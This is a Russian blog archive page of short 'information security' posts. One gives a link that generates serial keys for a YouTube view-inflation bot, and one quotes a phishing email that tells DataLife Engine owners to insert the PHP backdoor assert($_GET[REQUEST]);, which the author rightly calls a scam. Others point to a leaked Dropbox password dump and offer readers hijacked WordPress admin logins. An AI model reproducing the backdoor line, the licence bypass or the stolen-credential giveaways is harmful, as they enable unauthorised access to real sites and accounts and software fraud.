Архив рубрики: Информационная безопасность

magbo system

MagicViews Серийный ключ (serial key)

Сегодня попробовал скачать программу для накрутки просмотров на ютубе (Magic Views) — хотел накрутить просмотры ссылки, но увы.
Насчёт того работает она или нет — не знаю.

В общем для получения ключа нас кидают на сайт. Там нужно пройти рекламный опрос — короче подстава одним словом.
Я покопался в исходниках, нашёл скрипт, а в нём ссылку на файл php отвечающий за генерацию серийников.
В общем переходим по ссылке и пользуемся: http://youtubebots.org/magic-views-bot/generate.php

Поделись с друзьями, если помогло ;)

Критическая уязвимость сайтов на DLE

Screenshot_2014-10-19-11-03-12

 

Вот такое письмо пришло мне сегодня на почту от службы поддержки Datalife Engine. Я ожидал, что это будет сообщение о лицензии, но оказалось все намного серьезнее.

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте shlyahten.ruнашего ПО «CMS DataLife Engine — Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: shlyahten.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);



С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 199.27.128.202 

У меня есть предложение, что это развод. Так как такой код вполне может создать уязвимость. Ведь он ничего не фильтрует. Очень забавный и на мой взгляд эффективный способ взлома.

 

 

Слив паролей от dropbox

Базы логинов и паролей утекли на днях в сеть. Дропбокс утверждает, что взлома не было. База идёт в алфавитном порядке — видимо результат брутфорса. Неизвестные пообещали выкладывать базу частями (всего 7 000 000 данных) по мере поступления пожертвований на их биткоин-кошелек.

 

Вот первые три файла:

dropbox.com_hacked_first_teaser

dropbox.com_hacked_second_teaser

dropbox_hack_third_teaser

Админки (аккаунты) wordpress (раздача)

Месяц или два назад проводил эксперимент. Не знаю куда девать — разбирайте, возможно у  Вас есть идея как этим воспользоваться.

вид: адрес_сайта@логин:пароль Читать далее Админки (аккаунты) wordpress (раздача)